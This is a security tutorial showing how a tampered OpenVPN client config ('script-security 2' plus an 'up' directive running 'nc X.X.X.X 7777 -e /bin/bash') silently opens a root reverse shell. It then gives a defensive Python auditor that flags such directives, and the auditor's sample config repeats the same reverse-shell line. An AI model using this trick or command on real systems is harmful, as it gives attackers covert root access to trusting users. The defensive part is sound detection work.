On this occasion we will see how to get a shell on a remote computer acting as a VPN client, using OpenVPN's ability to run a command right after the tunnel comes up. Of course, the client must trust us completely (running a config file we supplied) or its VPN config must have been tampered with some other way. The notable thing about this attack is that everything appears to work normally for the user while the reverse connection is established in the background.
We put our netcat in listening mode to receive the reverse connection:
KettleBell ✺ ~> nc -l -p 7777
We edit the VPN config file so that it raises the script security level and runs a command when the connection comes up:
vi client.ovpn
script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"
The victim starts the VPN:
DirtyCow ~ # openvpn --config client.ovpn
In the netcat terminal, we get a nice shell:
KettleBell ✺ ~> nc -l -p 7777
id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
uname -a
Linux DirtyCow 4.9.95-gentoo-kr0m-ipv6-YAMA #1 SMP PREEMPT Wed Apr 25 10:22:48 CEST 2018 x86_64 Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz GenuineIntel GNU/Linux
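The defensive counterpart of the procedure above is to audit .ovpn files before they are imported: any config that raises script-security to 2 or higher, or that carries one of OpenVPN's command-executing directives (up, down, route-up, ipchange, plugin, and so on), deserves a look before it is run. The following Python script is an added example written for this page, not code from the original post; it parses a config file, skips inline certificate blocks, and reports every directive that would execute an external program. The sample config is constructed here to mirror the post, and the X.X.X.X address is the same placeholder the post uses.

```python
import shlex
from typing import Iterator, List, Tuple

# OpenVPN config directives whose argument is a command line that OpenVPN
# will execute (real directive names from the OpenVPN manual).
COMMAND_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "tls-verify", "auth-user-pass-verify", "client-connect",
    "client-disconnect", "learn-address", "plugin",
}

# Constructed sample config mirroring the post; not a real deployment.
SAMPLE_CONFIG = """\
# client config handed to the victim
client
dev tun
proto udp
remote vpn.example.invalid 1194
<ca>
-----BEGIN CERTIFICATE-----
placeholder
-----END CERTIFICATE-----
</ca>
script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"
"""


def parse_directives(config_text: str) -> Iterator[Tuple[str, List[str]]]:
    """Yield (directive, args) for each effective line of an OpenVPN config.

    Comment lines (# or ;) are ignored and <tag>...</tag> inline blocks
    (certificates, keys) are skipped so their contents are not mistaken
    for directives.
    """
    inside_inline = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if inside_inline:
            if line.startswith("</"):
                inside_inline = False
            continue
        if line.startswith("<") and not line.startswith("</"):
            inside_inline = True
            continue
        try:
            parts = shlex.split(line, comments=False)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            parts = line.split()
        if parts:
            yield parts[0].lstrip("-").lower(), parts[1:]


def audit_ovpn(config_text: str) -> List[Tuple[str, str]]:
    """Return (directive, detail) findings for anything that runs a program."""
    findings: List[Tuple[str, str]] = []
    for directive, args in parse_directives(config_text):
        if directive == "script-security" and args:
            try:
                level = int(args[0])
            except ValueError:
                findings.append(("script-security", "unparseable level: " + " ".join(args)))
                continue
            # Level 2 permits user-defined scripts; level 3 also passes
            # secrets to them via environment variables.
            if level >= 2:
                findings.append(("script-security", f"level {level} allows user-defined scripts"))
        elif directive in COMMAND_DIRECTIVES:
            findings.append((directive, " ".join(args)))
    return findings


if __name__ == "__main__":
    for directive, detail in audit_ovpn(SAMPLE_CONFIG):
        print(f"[!] {directive}: {detail}")
```

Run against the sample it reports both the raised script-security level and the up directive with its full command line, which is exactly the pair of lines the post relies on. OpenVPN's built-in default is script-security 1 (only its own ifconfig/route helpers may run), so a config that never mentions script-security cannot launch a user script; that is why the post has to set it explicitly, and why the directive is a good first thing to grep for.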